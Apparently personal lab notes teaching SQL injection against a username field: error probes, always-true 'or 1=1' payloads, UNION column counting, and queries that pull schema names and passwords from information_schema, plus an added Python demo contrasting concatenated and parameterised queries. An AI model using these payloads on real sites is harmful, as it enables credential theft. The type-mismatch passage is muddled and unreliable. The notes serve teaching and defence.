
SQL Injection

  1. Try to trigger an error using quotes:

jeremy     (returns a result)
jeremy'    (try to get an error)
jeremy"    (try to get an error)

  2. Logical operators:

jeremy' or 1=1#
jeremy' or 1=1-- -     (this is the same as the one above)

These dump the whole table. Why? You gave it a condition that is always true (1=1), so every row matches.

Two dashes (-- ) or # make everything after them get ignored (like commenting it out), which is what gets rid of the rest of the original query.

If you do:

jeremy' or 1=2#

you only get jeremy back, since the match on jeremy was the only true part of the condition.

ONE CONSTRAINT:

When you UNION SELECT, you can only select the same number of columns as the original query.

How do you figure out how many columns the original query selects? Add one null at a time until the UNION stops failing:

jeremy' union select null#

no users found

jeremy' union select null,null#

no users found

jeremy' union select null,null,null#

You get a result, which means the original query selects 3 columns.
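As an added example (not from the original notes), here is the kind of query construction that makes the probes above work, beside the parameterised form that stops them. It assumes a table called injection0x01 with columns id, username and password, builds its own rows, and uses SQLite in memory, so the probes use the "-- -" comment form from these notes rather than "#", which SQLite does not support.

```python
import sqlite3

# Constructed sample data (assumption: the notes' table plus an id column).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE injection0x01 (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO injection0x01 VALUES (?, ?, ?)",
                    [(1, "jeremy", "hunter2"), (2, "alice", "s3cret"), (3, "bob", "pa55w0rd")])
    return con

def build_vulnerable_sql(name):
    # The defect: user input is pasted into the SQL text, so a quote in the
    # input closes the string and a comment marker discards the rest.
    return f"SELECT id, username, password FROM injection0x01 WHERE username = '{name}'"

def lookup_vulnerable(con, name):
    # Mirrors an app that swallows database errors and just shows "no users
    # found": a wrong UNION column count raises, and the caller sees [].
    try:
        return con.execute(build_vulnerable_sql(name)).fetchall()
    except sqlite3.Error:
        return []

def lookup_safe(con, name):
    # Parameterised query: the value travels separately from the SQL text,
    # so the same input is compared literally and matches no username.
    sql = "SELECT id, username, password FROM injection0x01 WHERE username = ?"
    return con.execute(sql, (name,)).fetchall()

if __name__ == "__main__":
    con = make_db()
    for probe in ["jeremy", "jeremy'", "jeremy' or 1=1-- -", "jeremy' or 1=2-- -",
                  "jeremy' union select null,null-- -",
                  "jeremy' union select null,null,null-- -"]:
        print(f"{probe!r:45} vulnerable: {len(lookup_vulnerable(con, probe))} rows, "
              f"safe: {len(lookup_safe(con, probe))} rows")
```

Running it shows the or 1=1 probe returning every row and the three-null UNION returning an extra all-null row against the concatenated query, while the parameterised lookup returns nothing for any of the probes.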

Wanna know what version?

jeremy' union select null,null,version()#

Wanna know what tables exist?

jeremy' union select null,null,table_name from information_schema.tables#

Column names?

jeremy' union select null,null,column_name from information_schema.columns#

Print passwords from the table:

jeremy' union select null,null,password from injection0x01#

Note: injection0x01 is probably going to be "users" in a real DB.

Potential error:

If the first column of the original query is an int, you can get an error when you try to print a string in that position. (The "null(int)" below is just a marker for "this column is an int", not real SQL.)

jeremy' union select null(int),null,null from injection0x01#

How to fix?

Make the placeholder in that position match the column's type (a number rather than a string):

jeremy' union select null(int),1,null from injection0x01#

Great cheat sheet:

SQL injection cheat sheet | Web Security Academy (portswigger.net)

Blind Injection